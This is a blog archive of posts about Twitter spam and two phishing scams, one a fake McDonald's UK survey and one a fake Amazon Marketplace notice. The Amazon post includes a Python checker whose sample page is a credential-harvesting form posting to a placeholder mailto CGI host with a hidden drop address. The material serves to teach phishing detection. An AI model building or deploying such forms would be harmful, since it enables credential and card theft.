Archive for the ‘phishing’ Category.

Spam on Twitter = Twam?

I’ve no idea how many of you out there in blog-land use Twitter, but I’d guess quite a few of you do?

As a relatively new Twitter user, I’ve not seen many of the problems that Twitter has experienced over the last year, including account hacking, phishing, 419 scams, worms and other malcode problems. One area that seems (at least to me) to have been rather quiet has been spam via Twitter.

Until the last week or so, I’ve never received any. I’d be interested to know how many of you out there in blog-land who use Twitter have seen similar things to what I’m about to discuss.

I don’t think there is a specific name for Twitter spam, so I’ve coined one: Twam.

I’m sure the more creative of you out there can come up with something better?

Let’s have a look at a couple of examples I’ve seen in the last week or so:

1. The Vote For Me Twam
I received the following notification and when I checked out the profile for that user all their tweets were requests to vote for them in some beauty pageant.

As you can see, at the time I was sent this they had a fair few followers and were following (Twamming) lots of other Twitter users. When I checked this particular account again this morning, it was still active and still only begging for you to vote for her, at 60p per text no less! The number of followers now stands at 343 and she is following (Twamming) 1,986 other Twitter users.

2. The Porn Advertising Twam
I received the following notification just this morning and when I checked out the profile for that user they only have one tweet with a link to a porn site! So, they seem to be using Twitter to advertise their porn site.

Shortly after receiving the above notification, I received another using the same name, but from a different Twitter account. Their feed was exactly the same as the first one I received just 30 minutes earlier.

When I just checked both of these accounts (before publishing this) that were advertising a porn website they have now been closed by Twitter.

Needless to say I have blocked these Twitter accounts, as I don’t want to see what they offer and I don’t want to give them any credibility by being seen as being followed by them.

I wonder if this is the start of a major spam (twam) attack on this social networking site? I wouldn’t be surprised, as this fate has already befallen Facebook, MySpace and many other similar sites.

For those of you who are interested in following me on Twitter (no not you spammers/twammers) you can easily find me via my name or my Twitter account which is talkytoaster.

If you spot anything interesting feel free to send me a Tweet or a Direct message.

Take care and happy Tweeting.

McDonald’s Survey

I’d like to start this post with an apology [yes, again] as I have been rather slack in posting for quite a few weeks now. This has been due to a number of issues beyond my control including yet another change in my role. I still hope to post material here as often as I can, but it probably won’t be as frequent as it has been. So, to try and start the ball rolling once more I have the following phishy tale for you to enjoy.

Here’s a new one I’ve not seen before, the following e-mail arrived in my ‘Phish‘ inbox late last night [screenshot below]:

That’s nice, if I answer just seven questions in a simple survey I will get £25…..I smell a phish, so what do we see when I click on the link?

Hmmmmm…..looks pretty good, quite believable wouldn’t you say?

So, let me see what happens when I fill out the details with bogus data. First let me enter some bogus data for the survey and then click on submit. This is where I’m taken to next:

Aha…..Just as I suspected, this is a phish, as it wants personal data and my credit card data, including the CVV so that the promised £25 can be credited to my card, yeah right. So, let me enter in some more bogus data and click on the Submit button again.

I particularly like the misuse of the MasterCard SecureCode, VeriSign and Verified by Visa logos, just trying to make you feel secure, how reassuring, eh?

The final page [shown above] informs me that my data has been entered correctly [yeah right!] and that I should see my £25 credit payment on my credit card within 3-5 business days. More like my credit card will be misused or sold on to others to misuse within 3-5 business days! Oh, and then I get taken to the real McDonald’s UK website, nice ;-)

So, it seems that I was right to be suspicious, in fact a quick look at the link in the original e-mail made it obvious to me that this was a phishing scam.

The interesting thing about this phishing attempt is that this is the first time I’ve seen one targeting McDonald’s in the UK.

So, if you are a McDonald’s customer, or think that you’d like £25 for free, be on your guard as it seems that the phishers are now spending significant amounts of their time to finely target their potential victims and try and get you to disclose your details….

As a final note, the Netcraft toolbar plugin which works with Internet Explorer and Firefox now has the domains used for this phish in their database. So, install it and use it, it could save you from making an expensive mistake!

Amazon Marketplace Listing Canceled…

How many of you out there use Amazon’s Marketplace to sell items?

Well, if you do then this posting should be of some interest and I’d also be interested in how many of you have received similar emails to the one shown in the screenshot below:

Looks like a typical notification from Amazon that your item listed on Amazon Marketplace has been canceled; for those that use this Amazon service this usually happens when your item listing has expired, and is quite normal.

So, let me see where I end up when I click on the link contained in the e-mail; screenshot below:

 

Is this Amazon.co.uk? Looks genuine, doesn’t it? Would you sign in via this page, or not?

For the moment, let us assume [quite rightly] that I’m suspicious of this page, let me have a look at the source HTML for the page above; I’m especially interested in the FORM section (the bit that deals with the login credentials; your e-mail address and Amazon.co.uk password). Here’s a screenshot of the related part of the HTML source for that function:

Hmmm…..notice anything odd?

Surely the real Amazon.co.uk doesn’t use a generic mailto CGI script [in this case a PERL script] to handle login routines, does it?

No, of course it doesn’t. The code in the screenshot above sends your now stolen Amazon.co.uk login details to the bad guys and girls via e-mail using the mailto.pl script hosted on http://www-cgi.paonline. It then goes on to send you to the real Amazon.co.uk page, sneaky huh?
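The same check of the FORM section can be automated. The following is an added example, not code from the phish or from Amazon: it parses a page, finds forms that collect a password, and reports where they actually submit. The sample page, its host names and the hidden `recipient` and `redirect` fields are constructed assumptions about how a generic mailto CGI form is laid out.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample shaped like the form described above; hosts are placeholders.
SAMPLE_PAGE = """<html><body>
<form method="post" action="http://cgi.mailhost.example/cgi-bin/mailto.pl">
  <input type="hidden" name="recipient" value="drop@collector.example">
  <input type="hidden" name="redirect" value="https://www.amazon.co.uk/">
  <input type="text" name="email"><input type="password" name="password">
</form>
<form method="get" action="/search"><input type="text" name="q"></form>
</body></html>"""

class FormCollector(HTMLParser):
    """Record each <form> with its action and the <input> tags inside it."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)
    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def audit_login_forms(html, page_url, expected_domain):
    """Flag password forms whose submission target is not the expected site."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        inputs = form["inputs"]
        if not any((i.get("type") or "").lower() == "password" for i in inputs):
            continue  # only forms that collect a password are of interest
        target = urlparse(urljoin(page_url, form["action"]))
        host, reasons = (target.hostname or "").lower(), []
        if host != expected_domain and not host.endswith("." + expected_domain):
            reasons.append(f"credentials go to {host or target.scheme + ': URL'}")
        if target.scheme == "http":
            reasons.append("submitted over plain HTTP")
        reasons += [f"hidden field {i.get('name')!r} holds an e-mail address"
                    for i in inputs if (i.get("type") or "").lower() == "hidden"
                    and "@" in (i.get("value") or "")]
        if reasons:
            findings.append({"action": target.geturl(), "reasons": reasons})
    return findings
```

Calling `audit_login_forms(SAMPLE_PAGE, page_url, "amazon.co.uk")` returns one finding for the login form and ignores the search form, which has no password field.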

So, this is another phishing scam; in this case they want to steal your Amazon login credentials, so that they can steal any personal details, including any stored credit-card data, or maybe they just want to buy things using your account, and have them sent to a drop-box to then be turned into cash. Such as ordering themselves a new MP3 player, phone, some CDs or DVDs or whatever, leaving you to pick up the bill and deal with the resulting mess.

Of course this type of attack is not just limited to Amazon, it would in theory work with any e-commerce site, so be careful out there, especially where you have sites that store your credit-card details, as in most cases this is what the bad guys and girls are after. If they can’t get that then they will just buy things from the site using your stored card data instead.

Yet again, as with other recent examples I’ve blogged about, it shows that phishers are not just interested in getting your bank details, they are just as happy to get e-commerce site credentials, game login credentials (such as WoW) or webmail account details (how many of you store e-mails which contain personal or financial details?), amongst many others. Furthermore, do you use the same password for more than a single site? If you do then you are making it easier for the bad guys and girls to compromise your other accounts wherever they may be.